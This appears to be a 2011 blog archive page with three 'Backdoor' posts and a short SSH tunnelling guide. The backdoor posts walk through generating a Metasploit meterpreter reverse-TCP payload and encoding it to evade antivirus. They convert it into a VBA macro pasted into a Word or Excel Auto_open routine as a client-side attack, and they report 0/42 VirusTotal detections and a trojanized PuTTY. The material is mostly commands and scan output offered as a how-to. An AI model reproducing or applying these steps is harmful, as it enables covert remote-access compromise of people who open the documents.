Posts

Showing posts from May, 2011

(Backdoor Part 3) How to Convert *.EXE Payload into *.VBS Payload

This is the way I embedded it.

    root@LM:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.211.55.162 LPORT=8080 R | ./msfencode -t exe -e x86/shikata_ga_nai X > payload.exe
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    root@LM:/opt/metasploit3/msf#
    root@LM:/opt/metasploit3/msf3# mv payload.exe tools/
    root@LM:/opt/metasploit3/msf3/tools# ruby exe2vba.rb payload.exe payload.vbs
    [*] Converted 73802 bytes of EXE into a VBA script #payload.vbs

Now open MS Word/Excel and perform the following steps. In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor; if you're using Word/Excel 2007, go to View, Macros, then enter a name like "lancit" and select "Create". A Visual Basic editor will pop up; paste the output of payload.vbs into it and save it. Put any words you like in the actual Word document itself. The purpose is the client-side attack. The output looks like this:

    Sub Auto_open()
    . . . . . .
    En...

(Backdoor Part 2) At last.. Payload CAN'T BE DETECTED..!!

Why it can't be detected: at first I encoded it as *.exe, then I manipulated it using ruby to embed it inside a *.vbs extension, and below is the result from VirusTotal.

    File name: payload.vbs
    Submission date: 2011-05-23 17:32:43 (UTC)
    Current status: finished
    Result: 0/42 (0.0%)

    Additional information
    MD5   : 8e54f3b36507c7c3f4a80ee336e367ae
    SHA1  : ed8ba524a09494dcd7f86dbe5859339706264911
    SHA256: 3ff926d2c6dfcee6443de3f0f0916a5ce1d1ccebe6f55399fcb8118758fc041d
    ssdeep: 6144:kgwFOmxCAB1vR5CGikL/xz+fk+8yXRruNG63b/IjRuePX7k49TQ7rBlLRc3aT+ch:vwEmwAvvR5CbS/9R+86RruNbLgduePXI
    File size : 297145 bytes
    First seen: 2011-05-23 17:32:43
    Last seen : 2011-05-23 17:32:43
    TrID: Unknown!
    sigcheck:
      publisher....: n/a
      copyright....: n/a
      product......: n/a
      description..: n/a
      original name: n/a
      internal name: n/a
      file version.: n/a
      comments.....: n/a
      signers......: -
      signing date.: -
      verified.....: Unsigned

(Backdoor Part 1) Not A Successful Embedded PAYLOAD in Putty. But Close Enough.. :D

Hi Guys, tonight I managed to embed a PAYLOAD inside putty and, according to VirusTotal, it got detected (result below).

    File name: putty01.exe
    Result: 18/42 (42.9%)

The AVs that detected it are:

    AntiVir        7.11.8.89      2011.05.21  TR/Crypt.XPACK.Gen
    Avast          4.8.1351.0     2011.05.22  Win32:Vykuk
    Avast5         5.0.677.0      2011.05.22  Win32:Vykuk
    BitDefender    7.2            2011.05.22  Backdoor.Shell.AC
    CAT-QuickHeal  11.00          2011.05.22  (Suspicious) - DNAScan
    Commtouch      5.3.2.6        2011.05.22  W32/Swrort.D
    Comodo         8797           2011.05.22  Heur.Corrupt.PE
    DrWeb          5.0.2.03300    2011.05.22  Trojan.Packed.196
    eSafe          7.0.17.0       2011.05.22  Suspicious File
    F-Prot         4.6.2.117      2011.05.22  W32/Swrort.D
    F-Secure       9.0.16440.0    2011.05.22  Backdoor.Shell.AC
    GData          22             2011.05.22  Backdoor.Shell.AC
    Microsoft      1.6903         2011.05.22  Trojan:Win32/Swrort.A
    NOD32          6142           2011.05.22  a variant of Win32/Rozena.AG
    Norman         6.07.07        2011.05.22  W32/Swrort.A
    nProtect       2011-05-22.01  2011.05.22  Backdoor/W32.Shell.458752
    Sophos         4.65.0         ...

What is SSH and How to configure a SSH Reverse Tunnel

A simple explanation of SSH. Secure SHell: connectivity tools for secure communications over the internet. SSH is a replacement for telnet and rlogin. All communication is encrypted.

Purpose
Common uses of SSH:
1. You want to access a web interface that lies behind a firewall.
2. You want to secure your communications when you are on a public WLAN.

Steps Taken (By Problem)
=========

1. Problem: the server you want to access can only be reached via VPN.
Solution: create a reverse tunnel. Log in to your server over your VPN and run:

    ssh -R 9995:localhost:22 your.ssh-server.net

Once you are logged in on your.ssh-server.net, you can now access the remote server without the VPN:

    ssh -p 9995 localhost

2. Forward all your traffic through a tunnel.
Connect to your server first:

    ssh -D 8888 your.ssh-server.net

Define a SOCKS proxy in your browser settings with host '127.0.0.1' and port '8888'. Now all your browser traffic appears to come from that host! Enjoy!